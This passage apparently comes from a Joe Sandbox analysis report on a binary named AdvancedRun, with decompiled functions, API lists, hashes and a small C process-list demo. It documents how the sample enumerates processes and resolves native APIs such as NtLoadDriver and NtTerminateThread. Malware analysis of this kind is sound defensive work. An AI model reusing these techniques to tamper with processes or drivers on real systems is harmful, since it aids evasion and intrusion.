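    off = add_entry(g_buf, off, "System", 0x01d9a000ull, 0);
    off = add_entry(g_buf, off, "explorer.exe", 0x01d9a123ull, 0);
    return add_entry(g_buf, off, "powershell.exe", 0x01d9a456ull, 1);
}

/* Look a name up in the sample; g_ct receives CreateTime on a match. */
static int demo_lookup(const char *target) {
    g_ct = 0;
    return find_process(g_buf, build_sample(), target, &g_ct);
}
static int demo_truncated(void) {                                /* a cut-short buffer must be rejected */
    build_sample();
    return find_process(g_buf, 0x10, "System", &g_ct);
}

int main(void) {
    int bad = demo_truncated();
    int r = demo_lookup("POWERSHELL.EXE");
    printf("match=%d CreateTime=0x%llx truncated=%d alloc_size(0)=%u\n", r, (unsigned long long)g_ct, bad, alloc_size(0));
    return r == 1 ? 0 : 1;
}
```

Build with any C99 compiler; main() looks up one constructed name, prints its CreateTime and shows that a truncated buffer is rejected. On a Windows host the same walker would be pointed at the buffer that NtQuerySystemInformation(SystemProcessInformation) fills after the usual STATUS_INFO_LENGTH_MISMATCH retry, which in the sample is presumably what E00408F2A implements (the report does not show its body).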

                                                                  C-Code - Quality: 83%
                                                                  			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                  				int _v8;
                                                                  				int _v12;
                                                                  				intOrPtr _v16;
                                                                  				void* _v20;
                                                                  				int _v24;
                                                                  				void _v56;
                                                                  				char _v584;
                                                                  				char _v588;
                                                                  				char _v41548;
                                                                  				void* __edi;
                                                                  				void* _t40;
                                                                  				void _t46;
                                                                  				intOrPtr _t47;
                                                                  				intOrPtr* _t64;
                                                                  				intOrPtr* _t66;
                                                                  				intOrPtr _t67;
                                                                  				intOrPtr _t71;
                                                                  				int _t77;
                                                                  				void* _t80;
                                                                  				void* _t81;
                                                                  				void* _t82;
                                                                  				void* _t83;
                                                                  
                                                                   				E0040B550(0xa248, __ecx); // stack probe (__chkstk-style) for the 0xa000-byte local buffer
                                                                   				_t77 = 0;
                                                                   				_v8 = 0;
                                                                   				E00408E31();
                                                                   				_t40 =  *0x41c47c; // runtime-resolved pointer; class 5 = SystemProcessInformation, consistent with NtQuerySystemInformation (analyst inference)
                                                                   				if(_t40 != 0) {
                                                                   					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8); // first query into the stack buffer; _v8 receives the required length
                                                                   				}
                                                                   				if(_v8 == _t77) {
                                                                   					_v8 = 0x186a0; // no length returned: fall back to 100000 bytes
                                                                   				}
                                                                   				_v8 = _v8 + 0x3e80; // plus 16000 bytes of slack
                                                                   				_push(_v8);
                                                                   				L0040B26C(); // operator new (??2@YAPAXI@Z)
                                                                   				_t81 = _t40;
                                                                   				_v20 = _t81;
                                                                   				memset(_t81, _t77, _v8);
                                                                   				_t83 = _t82 + 0x10;
                                                                   				_v24 = _t77;
                                                                   				E00408E31();
                                                                   				E00408F2A(0x41c47c, _t81, _v8,  &_v24); // repeats the query into the heap buffer
                                                                  				L5:
                                                                   				while(1) {
                                                                   					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) { // +0x3c: ImageName.Buffer in the 32-bit SYSTEM_PROCESS_INFORMATION layout; NULL for the Idle entry
                                                                   						L16:
                                                                   						_t46 =  *_t81; // +0x00: NextEntryOffset
                                                                   						_t77 = 0;
                                                                   						if(_t46 == 0) {
                                                                   							_push(_v20);
                                                                   							L0040B272(); // release the process list buffer
                                                                   							return _t46;
                                                                   						}
                                                                   						_t81 = _t81 + _t46; // advance to the next entry
                                                                   						continue;
                                                                   					}
                                                                  					_t47 = _a4;
                                                                  					_t71 =  *((intOrPtr*)(_t47 + 0x34));
                                                                  					_v12 = _t77;
                                                                  					_v16 = _t71;
                                                                  					if(_t71 <= _t77) {
                                                                  						L10:
                                                                  						_t66 = 0;
                                                                  						L11:
                                                                  						if(_t66 == 0) {
                                                                  							E004090AF( &_v588);
                                                                  							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
                                                                  							_t32 = _t81 + 0x20; // 0x20
                                                                  							memcpy( &_v56, _t32, 8);
                                                                  							_t83 = _t83 + 0x10;
                                                                  							E004099ED(_a4 + 0x28,  &_v588);
                                                                  						} else {
                                                                  							_t26 = _t66 + 4; // 0x4
                                                                  							_t72 = _t26;
                                                                  							if( *_t26 == 0) {
                                                                  								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
                                                                  								_t28 = _t81 + 0x20; // 0x20
                                                                  								memcpy(_t66 + 0x214, _t28, 8);
                                                                  								_t83 = _t83 + 0x10;
                                                                  							}
                                                                  						}
                                                                  						goto L16;
                                                                  					}
                                                                  					_t67 =  *((intOrPtr*)(_t81 + 0x44));
                                                                  					_t80 = _t47 + 0x28;
                                                                  					while(1) {
                                                                  						_t64 = E00405A92(_v12, _t80);
                                                                  						if( *_t64 == _t67) {
                                                                  							break;
                                                                  						}
                                                                  						_v12 = _v12 + 1;
                                                                  						if(_v12 < _v16) {
                                                                  							continue;
                                                                  						}
                                                                  						goto L10;
                                                                  					}
                                                                  					_t66 = _t64;
                                                                  					goto L11;
                                                                  				}
                                                                  			}

                                                                  APIs
                                                                    • Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004097F6
                                                                  • memset.MSVCRT ref: 00409805
                                                                  • memcpy.MSVCRT ref: 0040988A
                                                                  • memcpy.MSVCRT ref: 004098C0
                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004098EC
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$memcpy$??2@??3@HandleModulememset
                                                                  • String ID:
                                                                  • API String ID: 3641025914-0
                                                                  • Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                  • Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
                                                                  • Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                  • Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 68%
                                                                  			E004067AC(char** __edi) {
                                                                  				void* __esi;
                                                                  				void* _t9;
                                                                  				void** _t11;
                                                                  				char** _t15;
                                                                  				char** _t24;
                                                                  				void* _t25;
                                                                  				char* _t28;
                                                                  				char* _t29;
                                                                  				char* _t30;
                                                                  				char* _t31;
                                                                  				char** _t33;
                                                                  
                                                                  				_t24 = __edi;
                                                                  				 *__edi = "cf@";
                                                                  				_t9 = E00406746(__edi);
                                                                  				_t28 = __edi[5];
                                                                  				if(_t28 != 0) {
                                                                  					_t9 = E004055D1(_t9, _t28);
                                                                  					_push(_t28);
                                                                  					L0040B272();
                                                                  				}
                                                                  				_t29 = _t24[4];
                                                                  				if(_t29 != 0) {
                                                                  					_t9 = E004055D1(_t9, _t29);
                                                                  					_push(_t29);
                                                                  					L0040B272();
                                                                  				}
                                                                  				_t30 = _t24[3];
                                                                  				if(_t30 != 0) {
                                                                  					_t9 = E004055D1(_t9, _t30);
                                                                  					_push(_t30);
                                                                  					L0040B272();
                                                                  				}
                                                                  				_t31 = _t24[2];
                                                                  				if(_t31 != 0) {
                                                                  					E004055D1(_t9, _t31);
                                                                  					_push(_t31);
                                                                  					L0040B272();
                                                                  				}
                                                                  				_t15 = _t24;
                                                                  				_pop(_t32);
                                                                  				_push(_t24);
                                                                  				_t33 = _t15;
                                                                  				_t25 = 0;
                                                                  				if(_t33[1] > 0 && _t33[0xd] > 0) {
                                                                  					do {
                                                                  						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
                                                                  						_t25 = _t25 + 1;
                                                                  					} while (_t25 < _t33[0xd]);
                                                                  				}
                                                                  				_t11 =  *( *_t33)();
                                                                  				free( *_t11);
                                                                  				return _t11;
                                                                  			}

                                                                  APIs
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004067C7
                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004067DA
                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004067ED
                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00406800
                                                                  • free.MSVCRT(00000000), ref: 00406839
                                                                    • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$free
                                                                  • String ID:
                                                                  • API String ID: 2241099983-0
                                                                  • Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                  • Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
                                                                  • Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                  • Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
                                                                  				intOrPtr _v12;
                                                                  				struct tagPOINT _v20;
                                                                  				struct tagRECT _v36;
                                                                  				int _t27;
                                                                  				struct HWND__* _t30;
                                                                  				struct HWND__* _t32;
                                                                  
                                                                  				_t30 = _a4;
                                                                  				if((_a8 & 0x00000001) != 0) {
                                                                  					_t32 = GetParent(_t30);
                                                                  					GetWindowRect(_t30,  &_v20);
                                                                  					GetClientRect(_t32,  &_v36);
                                                                  					MapWindowPoints(0, _t32,  &_v20, 2);
                                                                  					_t27 = _v36.right - _v12 - _v36.left;
                                                                  					_v20.x = _t27;
                                                                  					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
                                                                  				}
                                                                  				if((_a8 & 0x00000002) != 0) {
                                                                  					E00404FBB(_t30);
                                                                  				}
                                                                  				return 1;
                                                                  			}

                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 00405D0A
                                                                  • GetWindowRect.USER32 ref: 00405D17
                                                                  • GetClientRect.USER32 ref: 00405D22
                                                                  • MapWindowPoints.USER32 ref: 00405D32
                                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rect$ClientParentPoints
                                                                  • String ID:
                                                                  • API String ID: 4247780290-0
                                                                  • Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                  • Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
                                                                  • Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                  • Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

C-Code - Quality: 89%
/* Sandbox decompiler output. Reading added here, not part of the report: this appears to reverse an
   array of __eax elements of __ebx bytes each starting at _a4, swapping the outermost pair through a
   one-element scratch buffer and moving inward. L0040B26C / L0040B272 are the new / delete thunks the
   API ID lists as ??2@ / ??3@. */
E004083DC(void* __eax, int __ebx, void* _a4) {
	signed int _v8;
	signed int _v12;
	void* _v16;
	void* _t20;
	void* _t21;
	signed int _t28;
	void* _t32;
	void* _t34;

	_t20 = __eax;
	_v12 = _v12 & 0x00000000;
	_push(__ebx);
	_t28 = __eax - 1;
	L0040B26C();
	_v16 = __eax;
	if(_t28 > 0) {
		_t21 = _a4;
		_v8 = __ebx;
		_v8 =  ~_v8;
		_t32 = _t28 * __ebx + _t21;
		_a4 = _t21;
		do {
			memcpy(_v16, _a4, __ebx);
			memcpy(_a4, _t32, __ebx);
			_t20 = memcpy(_t32, _v16, __ebx);
			_a4 = _a4 + __ebx;
			_t32 = _t32 + _v8;
			_t34 = _t34 + 0x24;
			_v12 = _v12 + 1;
			_t28 = _t28 - 1;
		} while (_t28 > _v12);
	}
	_push(_v16);
	L0040B272();
	return _t20;
}

Memory Dump Source
• Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
Similarity
• API ID: memcpy$??2@??3@
• String ID:
• API String ID: 1252195045-0
• Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
• Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
• Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
• Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 76%
/* Sandbox decompiler output. Reading added here, not part of the report: releases four heap-allocated
   members of the object at __esi (offsets 0x30, 0x40, 0x2d4 and 0x2c0, the last being a pointer to a
   pointer that is freed in two steps) through the delete thunk L0040B272 (??3@ in the API ID) and then
   zeroes the fields, i.e. destructor-style cleanup. */
E00406746(void* __esi) {
	intOrPtr _t9;
	intOrPtr _t10;
	intOrPtr _t11;
	intOrPtr* _t18;
	void* _t19;

	_t19 = __esi;
	_t9 =  *((intOrPtr*)(__esi + 0x30));
	if(_t9 != 0) {
		_push(_t9);
		L0040B272();
	}
	_t10 =  *((intOrPtr*)(_t19 + 0x40));
	if(_t10 != 0) {
		_push(_t10);
		L0040B272();
	}
	_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
	if(_t11 != 0) {
		_push(_t11);
		L0040B272();
	}
	_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
	if(_t18 != 0) {
		_t11 =  *_t18;
		if(_t11 != 0) {
			_push(_t11);
			L0040B272();
			 *_t18 = 0;
		}
		_push(_t18);
		L0040B272();
	}
	 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
	 *((intOrPtr*)(_t19 + 0x30)) = 0;
	 *((intOrPtr*)(_t19 + 0x40)) = 0;
	 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
	return _t11;
}

Memory Dump Source
• Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
• Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
• Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
• Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 87%
/* Sandbox decompiler output. Reading added here, not part of the report: a window message handler keyed
   on _a4. 5 is WM_SIZE (three child controls are repositioned through Begin/DeferWindowPos and the
   client area invalidated), 0xf is WM_PAINT, and 0x24 is WM_GETMINMAXINFO, where +0x18/+0x1c in the
   MINMAXINFO at _a12 are ptMinTrackSize, fixed here to 200x200 (0xc8). _t21 in the first E00402E22
   call is left undefined by the decompiler. */
E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
	struct HDWP__* _v8;
	intOrPtr _v12;
	void* __ebx;
	intOrPtr _t37;
	intOrPtr _t42;
	RECT* _t44;

	_push(__ecx);
	_push(__ecx);
	_t42 = __ecx;
	_v12 = __ecx;
	if(_a4 != 5) {
		if(_a4 != 0xf) {
			if(_a4 == 0x24) {
				_t37 = _a12;
				 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
				 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
			}
		} else {
			E00402EC8(__ecx + 0x378);
		}
	} else {
		_v8 = BeginDeferWindowPos(3);
		_t44 = _t42 + 0x378;
		E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
		E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
		E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
		EndDeferWindowPos(_v8);
		InvalidateRect( *(_t44 + 0x10), _t44, 1);
		_t42 = _v12;
	}
	return E00402CED(_t42, _a4, _a8, _a12);
}

APIs
• BeginDeferWindowPos.USER32(00000003), ref: 0040ABBA
  • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
  • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
  • Part of subcall function 00402E22: DeferWindowPos.USER32 ref: 00402EB4
• EndDeferWindowPos.USER32(?), ref: 0040ABFE
• InvalidateRect.USER32(?,?,00000001), ref: 0040AC09
Memory Dump Source
• Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
Similarity
• API ID: DeferWindow$Rect$BeginClientInvalidateItem
• String ID: $
• API String ID: 2498372239-3993045852
• Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
• Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
• Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
• Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 100%
/* Sandbox decompiler output. Reading added here, not part of the report: a subclass window procedure.
   On WM_KEYDOWN (0x100) for 'A' (0x41) with either Ctrl key held (VK_LCONTROL 0xa2 / VK_RCONTROL 0xa3)
   and no Shift (0xa0/0xa1) or Alt (0xa4/0xa5) key down, it sends EM_SETSEL (0xb1) with 0 and -1, i.e. a
   Ctrl+A select-all for an edit control, then chains to the original procedure saved at 0x40f2f0. */
E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
	int _t14;

	if(_a8 == 0x100 && _a12 == 0x41) {
		GetKeyState(0xa2);
		if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
			if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
				_t14 = E00403A60(0xa5);
				if(_t14 == 0) {
					SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
				}
			}
		}
	}
	return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
}

APIs
• GetKeyState.USER32(000000A2), ref: 00403A8C
  • Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
• CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C
Memory Dump Source
• Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
Similarity
• API ID: State$CallMessageProcSendWindow
• String ID: A
• API String ID: 3924021322-3554254475
• Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
• Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
• Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
• Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59
Uniqueness
• Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 91%
                                                                  			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
                                                                  				intOrPtr _v20;
                                                                  				char _v1072;
                                                                  				void _v3672;
                                                                  				char _v4496;
                                                                  				intOrPtr _v4556;
                                                                  				char _v4560;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				intOrPtr* _t41;
                                                                  				void* _t45;
                                                                  
                                                                  				_t45 = __eflags;
                                                                  				E0040B550(0x11cc, __ecx);
                                                                  				E00402923( &_v4560);
                                                                  				_v4560 = 0x40db44;
                                                                  				E00406670( &_v4496, _t45);
                                                                  				_v4496 = 0x40dab0;
                                                                  				memset( &_v3672, 0, 0x10);
                                                                  				E0040A909( &_v1072);
                                                                  				_t41 = _a4;
                                                                  				_v4556 = 0x71;
                                                                  				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
                                                                  					L0040B266();
                                                                  					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
                                                                  				}
                                                                  				_v4496 = 0x40dab0;
                                                                  				_v4560 = 0x40db44;
                                                                  				E004067AC( &_v4496);
                                                                  				return E00402940( &_v4560);
                                                                  			}

                                                                  Instruction addresses (one per line of the C-Code above): 0x004034f0 0x004034f8 0x00403506 0x00403516 0x0040351c 0x00403531 0x00403537 0x00403545 0x0040354a 0x00403556 0x00403567 0x00403575 0x00403583 0x00403583 0x00403586 0x00403592 0x00403598 0x004035ac

                                                                  APIs
                                                                    • Part of subcall function 00402923: memset.MSVCRT ref: 00402935
                                                                    • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
                                                                    • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
                                                                    • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
                                                                    • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722
                                                                  • memset.MSVCRT ref: 00403537
                                                                  • _ultow.MSVCRT ref: 00403575
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@$memset$_ultow
                                                                  • String ID: cf@$q
                                                                  • API String ID: 3448780718-2693627795
                                                                  • Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                  • Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
                                                                  • Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                  • Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 83%
                                                                  			E00402F31(void* _a4) {
                                                                  				void _v530;
                                                                  				long _v532;
                                                                  				void* __edi;
                                                                  				wchar_t* _t15;
                                                                  				intOrPtr _t18;
                                                                  				short* _t19;
                                                                  				void* _t29;
                                                                  
                                                                  				_v532 = _v532 & 0x00000000;
                                                                  				memset( &_v530, 0, 0x208);
                                                                  				E00404AD9( &_v532);
                                                                  				_t15 = wcsrchr( &_v532, 0x2e);
                                                                  				if(_t15 != 0) {
                                                                  					 *_t15 =  *_t15 & 0x00000000;
                                                                  				}
                                                                  				wcscat( &_v532, L".cfg");
                                                                  				_t18 =  *0x40fa74; // 0x4101c8
                                                                  				_t19 = _t18 + 0x5504;
                                                                  				_t36 =  *_t19;
                                                                  				_pop(_t29);
                                                                  				if( *_t19 != 0) {
                                                                  					E00404923(0x104,  &_v532, _t19);
                                                                  					_pop(_t29);
                                                                  				}
                                                                  				return E00402FC6(_t29, _t36,  &_v532);
                                                                  			}

                                                                  Instruction addresses (one per line of the C-Code above): 0x00402f3a 0x00402f51 0x00402f60 0x00402f6f 0x00402f78 0x00402f7a 0x00402f7a 0x00402f8a 0x00402f8f 0x00402f94 0x00402f99 0x00402f9e 0x00402f9f 0x00402fad 0x00402fb2 0x00402fb2 0x00402fc5

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00402F51
                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                  • wcsrchr.MSVCRT ref: 00402F6F
                                                                  • wcscat.MSVCRT ref: 00402F8A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
